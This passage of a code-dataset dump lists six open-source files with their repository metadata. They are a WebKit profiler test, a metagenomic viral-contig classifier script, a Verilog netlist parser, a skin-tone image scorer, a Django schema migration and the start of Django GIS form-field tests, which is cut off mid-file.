repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
attilahorvath/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/profiler_unittest.py | 124 | 5111 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.system.platforminfo_mock import MockPlatformInfo
from webkitpy.common.system.systemhost_mock import MockSystemHost
from .profiler import ProfilerFactory, GooglePProf
class ProfilerFactoryTest(unittest.TestCase):
def _assert_default_profiler_name(self, os_name, expected_profiler_name):
profiler_name = ProfilerFactory.default_profiler_name(MockPlatformInfo(os_name))
self.assertEqual(profiler_name, expected_profiler_name)
def test_default_profilers(self):
self._assert_default_profiler_name('mac', 'iprofiler')
self._assert_default_profiler_name('linux', 'perf')
self._assert_default_profiler_name('win32', None)
self._assert_default_profiler_name('freebsd', None)
def test_default_profiler_output(self):
host = MockSystemHost()
self.assertFalse(host.filesystem.exists("/tmp/output"))
# Default mocks are Mac, so iprofile should be default.
profiler = ProfilerFactory.create_profiler(host, '/bin/executable', '/tmp/output')
self.assertTrue(host.filesystem.exists("/tmp/output"))
self.assertEqual(profiler._output_path, "/tmp/output/test.dtps")
# Linux defaults to perf.
host.platform.os_name = 'linux'
profiler = ProfilerFactory.create_profiler(host, '/bin/executable', '/tmp/output')
self.assertEqual(profiler._output_path, "/tmp/output/test.data")
class GooglePProfTest(unittest.TestCase):
def test_pprof_output_regexp(self):
pprof_output = """
sometimes
there
is
junk before the total line
Total: 3770 samples
76 2.0% 2.0% 104 2.8% lookup (inline)
60 1.6% 3.6% 60 1.6% FL_SetPrevious (inline)
56 1.5% 5.1% 56 1.5% MaskPtr (inline)
51 1.4% 6.4% 222 5.9% WebCore::HTMLTokenizer::nextToken
42 1.1% 7.6% 47 1.2% WTF::Vector::shrinkCapacity
35 0.9% 8.5% 35 0.9% WTF::RefPtr::get (inline)
33 0.9% 9.4% 43 1.1% append (inline)
29 0.8% 10.1% 67 1.8% WTF::StringImpl::deref (inline)
29 0.8% 10.9% 100 2.7% add (inline)
28 0.7% 11.6% 28 0.7% WebCore::QualifiedName::localName (inline)
25 0.7% 12.3% 27 0.7% WebCore::Private::addChildNodesToDeletionQueue
24 0.6% 12.9% 24 0.6% __memcpy_ssse3_back
23 0.6% 13.6% 23 0.6% intHash (inline)
23 0.6% 14.2% 76 2.0% tcmalloc::FL_Next
23 0.6% 14.8% 95 2.5% tcmalloc::FL_Push
22 0.6% 15.4% 22 0.6% WebCore::MarkupTokenizerBase::InputStreamPreprocessor::peek (inline)
"""
expected_first_ten_lines = """ 76 2.0% 2.0% 104 2.8% lookup (inline)
60 1.6% 3.6% 60 1.6% FL_SetPrevious (inline)
56 1.5% 5.1% 56 1.5% MaskPtr (inline)
51 1.4% 6.4% 222 5.9% WebCore::HTMLTokenizer::nextToken
42 1.1% 7.6% 47 1.2% WTF::Vector::shrinkCapacity
35 0.9% 8.5% 35 0.9% WTF::RefPtr::get (inline)
33 0.9% 9.4% 43 1.1% append (inline)
29 0.8% 10.1% 67 1.8% WTF::StringImpl::deref (inline)
29 0.8% 10.9% 100 2.7% add (inline)
28 0.7% 11.6% 28 0.7% WebCore::QualifiedName::localName (inline)
"""
host = MockSystemHost()
profiler = GooglePProf(host, '/bin/executable', '/tmp/output')
self.assertEqual(profiler._first_ten_lines_of_profile(pprof_output), expected_first_ten_lines)
| bsd-3-clause |
alexcritschristoph/CircMG | classify.py | 4 | 5634 | '''
Alex Crits-Christoph
License: GPL3
Classifies viral metagenomic contigs using a random forest classifier built on public datasets.
'''
import sys
import numpy
import subprocess
import os
import cPickle as pickle
from sklearn.ensemble import RandomForestClassifier
from collections import defaultdict
import os.path
from Bio import SeqIO
import argparse
def main(input_file, prodigal_path, min_contig):
contigs = {}
#Check that prodigal is installed
try:
subprocess.call(["which", prodigal_path])
except:
print "[ERROR] Prodigal is not installed and available with the specified path."
sys.exit(1)
#Check that the input file exists
if not os.path.isfile(input_file):
print "[ERROR] The input file does not appear to exist."
sys.exit(1)
#Remove old output
with open(os.devnull, 'wb') as devnull:
subprocess.check_call(['rm','-rf','./' + input_file.split("/")[-1].split(".")[0] + '_output/'], stdout=devnull, stderr=subprocess.STDOUT)
#Make new directory
with open(os.devnull, 'wb') as devnull:
subprocess.check_call(['mkdir','./' + input_file.split("/")[-1].split(".")[0] + '_output/'], stdout=devnull, stderr=subprocess.STDOUT)
#Keep only contigs > min_length
print "[1] Excluding contigs less than " + str(min_contig) + " bp in length."
handle = open(input_file, "rU")
l = SeqIO.parse(handle, "fasta")
new_input = './' + input_file.split("/")[-1].split(".")[0] + '_output/' + input_file.split("/")[-1].split(".")[0] + "_filtered.fa"
f = open(new_input, 'a+')
contig_list = {}
for s in l:
if len(s.seq) >= int(min_contig):
f.write(">" + s.id + "\n")
f.write(str(s.seq) + "\n")
contig_list[s.id] = s.seq
f.close()
#Run prodigal
print "[2] Predicting genes and proteins with Prodigal (this could take a while)..."
sts = subprocess.Popen(prodigal_path + ' -p meta -f gff -o ./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.gff -i ' + new_input + ' -q', shell=True).wait()
print "[3] Generating features for machine learning..."
contigs = []
genes = {}
introns = {}
confs = {}
strands = {}
with open('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.gff', "r") as f:
previous_end = 0
previous_strand = -1
previous_contig = ""
for line in f:
if line.startswith("#"):
previous_end = 0
previous_strand = 0
if not line.startswith("#"):
#get gene size
contig = line.split()[0]
s = int(line.split()[3])
e = int(line.split()[4])
gene_size = int(e) - int(s)
#get reading strand (-) or (+)
stra = line.split()[6]
if stra == "+":
strand = 1.0
else:
strand = 0.0
if contig != previous_contig:
previous_contig = contig
previous_end = e
previous_strand = strand
contigs.append(contig)
genes[contig] = []
introns[contig] = []
confs[contig] = []
strands[contig] = []
continue
#get intron length
intron_length = s - previous_end
if strand == previous_strand:
strandedness = 1
else:
strandedness = 0
previous_end = e
previous_strand = strand
#get conf
conf = float(line.split("conf=")[1].split(";")[0])
genes[contig].append(gene_size)
introns[contig].append(intron_length)
confs[contig].append(conf)
strands[contig].append(strandedness)
f = open('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.dat','w+')
for contig in contigs:
if len(genes[contig]) > 10:
f.write(str(float(sum(genes[contig])) / len(genes[contig])) + "," + str(float(sum(introns[contig])) / len(introns[contig])) + "," + str(float(sum(confs[contig])) / len(confs[contig])) + "," + str(float(sum(strands[contig])) / len(strands[contig])) + "\n")
f.close()
print "[4] Loading classifier into memory..."
try:
forest_fit = pickle.load( open( "./data/classifier.p", "rb" ) )
except:
print "Error: could not load the classifier. Make sure it can be found in ./data/classifier.p."
sys.exit(1)
print "[5] Loading feature data..."
testdata = numpy.loadtxt('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.dat', delimiter=",")
print "[6] Classifing features..."
classified = list(forest_fit.predict(testdata))
j = 0
print "Viral contigs:"
viral_contigs = []
results_string = ''
for i in classified:
if i == 1:
results_string += str(contigs[j]) + ","
viral_contigs.append(contigs[j])
j += 1
results_string = results_string.rstrip(",")
print results_string
print "[7] Saving results to ./" + input_file.split("/")[-1].split(".")[0] + '_output/viral.fna'
f = open('./' + input_file.split("/")[-1].split(".")[0] + '_output/viral.fna', 'a+')
for contig in viral_contigs:
f.write(">" + str(contig) + "\n")
f.write(str(contig_list[contig]) + "\n")
print "[8] Complete. Cleaning up and exiting..."
if __name__ == '__main__':
__author__ = "Alex Crits-Christoph"
parser = argparse.ArgumentParser(description='Classifies viral metagenomic contigs using a random forest classifier built on public datasets. Features are gene length, intergenic space length, strandedness, and prodigal calling gene confidence.')
parser.add_argument('-i','--input', help='Input assembly filename',required=True)
parser.add_argument('-m', '--min_contig_size', help='Minimum contig size to use (default: 10 kbp)', required=False)
parser.add_argument('-p', '--prodigal_path', help='Path to prodigal (default: prodigal)', required=False)
args = parser.parse_args()
if args.min_contig_size == None:
args.min_contig_size = 10000
if args.prodigal_path == None:
args.prodigal_path = 'prodigal'
main(args.input, args.prodigal_path, args.min_contig_size) | gpl-2.0 |
mplewis/verilive-server | ivernetp/parsers.py | 2 | 7394 | from .ivl_structures import IvlModule, IvlPort
from .ivl_elabs import IvlElabNetPartSelect, IvlElabPosedge, IvlElabLogic
from .ivl_enums import IvlElabType, IvlPortType, IvlDataDirection
from .utils import leading_spaces, is_local_finder, group_lines
import re
# Used to lookup enum types from strings
ELAB_TYPE_LOOKUP = {
'NetPartSelect': IvlElabType.net_part_select,
'posedge': IvlElabType.posedge,
'logic': IvlElabType.logic
}
def parse_netlist_to_sections(raw_netlist):
"""
Take raw text from a netlist file and turn it into lists of lines grouped
by section.
Sections look like this:
SCOPES:
ELABORATED NODES:
...etc.
Returns a dict.
Keys are the name of the section.
Values are an array of lines that make up that section.
"""
# This regex matches lines that start with a caps letter, contain caps and
# spaces, and are followed by a colon, then any characters
section_regex = '[A-Z][A-Z ]*:.*'
section_finder = re.compile(section_regex)
sections = {}
title = None
section = []
for line in raw_netlist.split('\n'):
if section_finder.match(line):
if not section:
section = None
if title:
sections[title] = section
section = []
title, data = line.split(':')
if data:
section = data.strip()
else:
section.append(line)
if title:
sections[title] = section
return sections
def parse_module_lines(lines, net_manager):
"""
Parse lines that make up a module. Add the module to the proper nets using
the specified NetManager.
Returns an IvlModule object.
"""
module_meta = lines[0]
module_data = lines[1:]
name, supertype, module_type_raw, inst_type = module_meta.split(' ')
module_type = module_type_raw.lstrip('<').rstrip('>')
ports = parse_module_data(module_data, net_manager)
module = IvlModule(name, module_type, ports)
for port in ports:
port.parent_module = module
return module
def parse_module_data(lines, net_manager):
"""
Parse the module data (not the first line, which is metadata).
Returns a list of IvlPort objects created from the module.
"""
ports = []
port = None
for line in lines:
# Port declarations have four leading spaces
if leading_spaces(line) == 4:
if port:
ports.append(port)
port = None
line = line.lstrip(' ')
# reg or wire lines
if line.startswith('reg') or line.startswith('wire'):
is_local = is_local_finder.search(line)
# Line starts with either 'reg' or 'wire'
if line.startswith('reg'):
xtype = IvlPortType.reg
else:
xtype = IvlPortType.wire
# reg: <name>[0:0 count=1]
# wire: <name>[0:0 count=1]
name = line.split(': ')[1].split('[')[0]
# wire: in[0:0 count=1] logic <direction_raw> (eref=0, lref=0)
direction_raw = (line
.split('logic')[1]
.split('(eref')[0]
.strip(' '))
# Convert direction_raw to an IvlDataDirection
try:
direction = IvlDataDirection[direction_raw]
except KeyError:
direction = None
# vector_width=<width>
width = int(line
.split('vector_width=')[1]
.split(' pin_count=')[0])
port = IvlPort(name, xtype, width=width, direction=direction,
is_local=is_local)
# event lines
elif line.startswith('event'):
xtype = IvlPortType.event
# event <name>;
name = line.split('event ')[1].split(';')[0]
# event _s0; ... // <snippet>
snippet = line.split('// ')[1]
port = IvlPort(name, xtype, code_snippet=snippet)
# Port data lines have eight leading spaces
elif leading_spaces(line) == 8:
if port:
net_id, net_name = line.split(': ')[1].split(' ')
net_manager.add_port_to_net(net_id, net_name, port)
if port:
ports.append(port)
return ports
def parse_elab_bundle_lines(lines, net_manager):
"""
Parses lines from an elab into a Logic, Posedge, or NetPartSelect IvlElab
object.
Returns the new IvlElab object.
"""
# posedge -> ...
# NetPartSelect(PV): ...
# logic: ...
xtype_raw = lines[0].split(' -> ')[0].split('(')[0].split(':')[0]
xtype = ELAB_TYPE_LOOKUP[xtype_raw]
info_split = lines[0].split(' ')
if xtype is IvlElabType.net_part_select:
# NetPartSelect(<io_size_flag>): <name> #(.,.,.) \
# off=<offset> wid=<width>
offset = int(info_split[3][4:])
width = int(info_split[4][4:])
# PV vs VP indicates which port is larger, the first or second
io_size_flag = lines[0].split('(')[1].split(')')[0]
if io_size_flag == 'PV':
large_net = IvlDataDirection.output
elif io_size_flag == 'VP':
large_net = IvlDataDirection.input
else:
raise ValueError('Invalid IO size flag: %s' % io_size_flag)
elif xtype is IvlElabType.logic:
# logic: <logic_type> ...
logic_type = info_split[1]
input_nets = []
output_nets = []
for line in lines[1:]:
# Net lines have four leading spaces. Example line:
# 0 pin0 I (strong0 strong1): 0x7fbd08d0a630 bargraph_testbench.b._s0
line_split = line.split(' ')
data_dir = line_split[6]
net_id = line_split[9]
net_name = line_split[10]
net = net_manager.get_or_make_net(net_id, net_name)
if data_dir == 'I':
input_nets.append(net)
elif data_dir == 'O':
output_nets.append(net)
else:
raise ValueError('Invalid net data direction: %s' % data_dir)
if xtype is IvlElabType.net_part_select:
elab = IvlElabNetPartSelect(input_nets[0], output_nets[0], large_net,
offset, width)
elif xtype is IvlElabType.posedge:
elab = IvlElabPosedge(input_nets[0])
elif xtype is IvlElabType.logic:
elab = IvlElabLogic(logic_type, input_nets, output_nets[0])
else:
raise ValueError('Invalid elab xtype: %s' % xtype)
return elab
def parse_modules_and_elabs(raw_netlist, net_manager):
"""
Parses a raw netlist into its IvlModule and IvlElab objects.
Returns a tuple: (modules, elabs)
modules is a list of IvlModule objects.
elabs is a list of IvlElab objects.
"""
sections = parse_netlist_to_sections(raw_netlist)
modules_lines = group_lines(sections['SCOPES'])
elab_bundles_lines = group_lines(sections['ELABORATED NODES'])
modules = [parse_module_lines(lines, net_manager)
for lines in modules_lines]
elabs = [parse_elab_bundle_lines(lines, net_manager)
for lines in elab_bundles_lines]
return modules, elabs
| mit |
wolfdale/NSFW-ImageScanner | Test.py | 1 | 1366 | from PIL import Image
THRESHOLD = 0.5
def main():
im=Image.open('Input_Image.jpg')
ycbcr_image = Image.new('RGB', im.size, 'black')
ycbcr=convert_to_ycbcr(im)
'''
pix=ycbcr_image.load()
for i in range(0, im.size[0]):
for j in range(0, im.size[1]):
pix[i, j] = tuple(map(int, ycbcr[i * im.size[1] + j]))
ycbcr_image.save('nin.jpg')
'''
def judge(sample):
y, cb, cr = sample
return 80 <= cb <= 120 and 133 <= cr <= 173
judged = map(judge, ycbcr)
print judged.count(True)
print judged.count(False)
print len(judged)
rating = float(judged.count(True)) / len(judged)
print rating > THRESHOLD, rating*100
#function to Convert rgb image to ycbcr
def convert_to_ycbcr(im):
dummy=[]
x = im.size[0]
y = im.size[1]
for i in range(x):
for j in range(y):
r, g, b = im.getpixel((i,j))
dummy.append( (
16 + (65.738 * r + 129.057 * g + 25.064 * b) / 256,
128 + (-37.945 * r - 74.494 * g + 112.439 * b) / 256,
128 + (112.439 * r - 94.154 * g - 18.285 * b) / 256
))
return dummy
if __name__=='__main__':
main()
| mit |
dsajkl/123 | common/djangoapps/student/migrations/0018_auto.py | 188 | 10521 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'CourseEnrollment', fields ['created']
db.create_index('student_courseenrollment', ['created'])
def backwards(self, orm):
# Removing index on 'CourseEnrollment', fields ['created']
db.delete_index('student_courseenrollment', ['created'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.courseenrollment': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'occupation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'telephone_number': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
| agpl-3.0 |
Adnn/django | tests/gis_tests/test_geoforms.py | 292 | 14830 | from unittest import skipUnless
from django.contrib.gis import forms
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.geos import GEOSGeometry
from django.forms import ValidationError
from django.test import SimpleTestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.html import escape
@skipUnless(HAS_GDAL, "GeometryFieldTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class GeometryFieldTest(SimpleTestCase):
def test_init(self):
"Testing GeometryField initialization with defaults."
fld = forms.GeometryField()
for bad_default in ('blah', 3, 'FoO', None, 0):
self.assertRaises(ValidationError, fld.clean, bad_default)
def test_srid(self):
"Testing GeometryField with a SRID set."
# Input that doesn't specify the SRID is assumed to be in the SRID
# of the input field.
fld = forms.GeometryField(srid=4326)
geom = fld.clean('POINT(5 23)')
self.assertEqual(4326, geom.srid)
# Making the field in a different SRID from that of the geometry, and
# asserting it transforms.
fld = forms.GeometryField(srid=32140)
tol = 0.0000001
xform_geom = GEOSGeometry('POINT (951640.547328465 4219369.26171664)', srid=32140)
# The cleaned geometry should be transformed to 32140.
cleaned_geom = fld.clean('SRID=4326;POINT (-95.363151 29.763374)')
self.assertTrue(xform_geom.equals_exact(cleaned_geom, tol))
def test_null(self):
"Testing GeometryField's handling of null (None) geometries."
# Form fields, by default, are required (`required=True`)
fld = forms.GeometryField()
with six.assertRaisesRegex(self, forms.ValidationError,
"No geometry value provided."):
fld.clean(None)
# This will clean None as a geometry (See #10660).
fld = forms.GeometryField(required=False)
self.assertIsNone(fld.clean(None))
def test_geom_type(self):
"Testing GeometryField's handling of different geometry types."
# By default, all geometry types are allowed.
fld = forms.GeometryField()
for wkt in ('POINT(5 23)', 'MULTIPOLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'LINESTRING(0 0, 1 1)'):
self.assertEqual(GEOSGeometry(wkt), fld.clean(wkt))
pnt_fld = forms.GeometryField(geom_type='POINT')
self.assertEqual(GEOSGeometry('POINT(5 23)'), pnt_fld.clean('POINT(5 23)'))
# a WKT for any other geom_type will be properly transformed by `to_python`
self.assertEqual(GEOSGeometry('LINESTRING(0 0, 1 1)'), pnt_fld.to_python('LINESTRING(0 0, 1 1)'))
# but rejected by `clean`
self.assertRaises(forms.ValidationError, pnt_fld.clean, 'LINESTRING(0 0, 1 1)')
def test_to_python(self):
"""
Testing to_python returns a correct GEOSGeometry object or
a ValidationError
"""
fld = forms.GeometryField()
# to_python returns the same GEOSGeometry for a WKT
for wkt in ('POINT(5 23)', 'MULTIPOLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'LINESTRING(0 0, 1 1)'):
self.assertEqual(GEOSGeometry(wkt), fld.to_python(wkt))
# but raises a ValidationError for any other string
for wkt in ('POINT(5)', 'MULTI POLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'BLAH(0 0, 1 1)'):
self.assertRaises(forms.ValidationError, fld.to_python, wkt)
def test_field_with_text_widget(self):
class PointForm(forms.Form):
pt = forms.PointField(srid=4326, widget=forms.TextInput)
form = PointForm()
cleaned_pt = form.fields['pt'].clean('POINT(5 23)')
self.assertEqual(cleaned_pt, GEOSGeometry('POINT(5 23)'))
self.assertEqual(4326, cleaned_pt.srid)
point = GEOSGeometry('SRID=4326;POINT(5 23)')
form = PointForm(data={'pt': 'POINT(5 23)'}, initial={'pt': point})
self.assertFalse(form.has_changed())
@skipUnless(HAS_GDAL, "SpecializedFieldTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class SpecializedFieldTest(SimpleTestCase):
def setUp(self):
self.geometries = {
'point': GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)"),
'multipoint': GEOSGeometry("SRID=4326;MULTIPOINT("
"(13.18634033203125 14.504356384277344),"
"(13.207969665527 14.490966796875),"
"(13.177070617675 14.454917907714))"),
'linestring': GEOSGeometry("SRID=4326;LINESTRING("
"-8.26171875 -0.52734375,"
"-7.734375 4.21875,"
"6.85546875 3.779296875,"
"5.44921875 -3.515625)"),
'multilinestring': GEOSGeometry("SRID=4326;MULTILINESTRING("
"(-16.435546875 -2.98828125,"
"-17.2265625 2.98828125,"
"-0.703125 3.515625,"
"-1.494140625 -3.33984375),"
"(-8.0859375 -5.9765625,"
"8.525390625 -8.7890625,"
"12.392578125 -0.87890625,"
"10.01953125 7.646484375))"),
'polygon': GEOSGeometry("SRID=4326;POLYGON("
"(-1.669921875 6.240234375,"
"-3.8671875 -0.615234375,"
"5.9765625 -3.955078125,"
"18.193359375 3.955078125,"
"9.84375 9.4921875,"
"-1.669921875 6.240234375))"),
'multipolygon': GEOSGeometry("SRID=4326;MULTIPOLYGON("
"((-17.578125 13.095703125,"
"-17.2265625 10.8984375,"
"-13.974609375 10.1953125,"
"-13.359375 12.744140625,"
"-15.732421875 13.7109375,"
"-17.578125 13.095703125)),"
"((-8.525390625 5.537109375,"
"-8.876953125 2.548828125,"
"-5.888671875 1.93359375,"
"-5.09765625 4.21875,"
"-6.064453125 6.240234375,"
"-8.525390625 5.537109375)))"),
'geometrycollection': GEOSGeometry("SRID=4326;GEOMETRYCOLLECTION("
"POINT(5.625 -0.263671875),"
"POINT(6.767578125 -3.603515625),"
"POINT(8.525390625 0.087890625),"
"POINT(8.0859375 -2.13134765625),"
"LINESTRING("
"6.273193359375 -1.175537109375,"
"5.77880859375 -1.812744140625,"
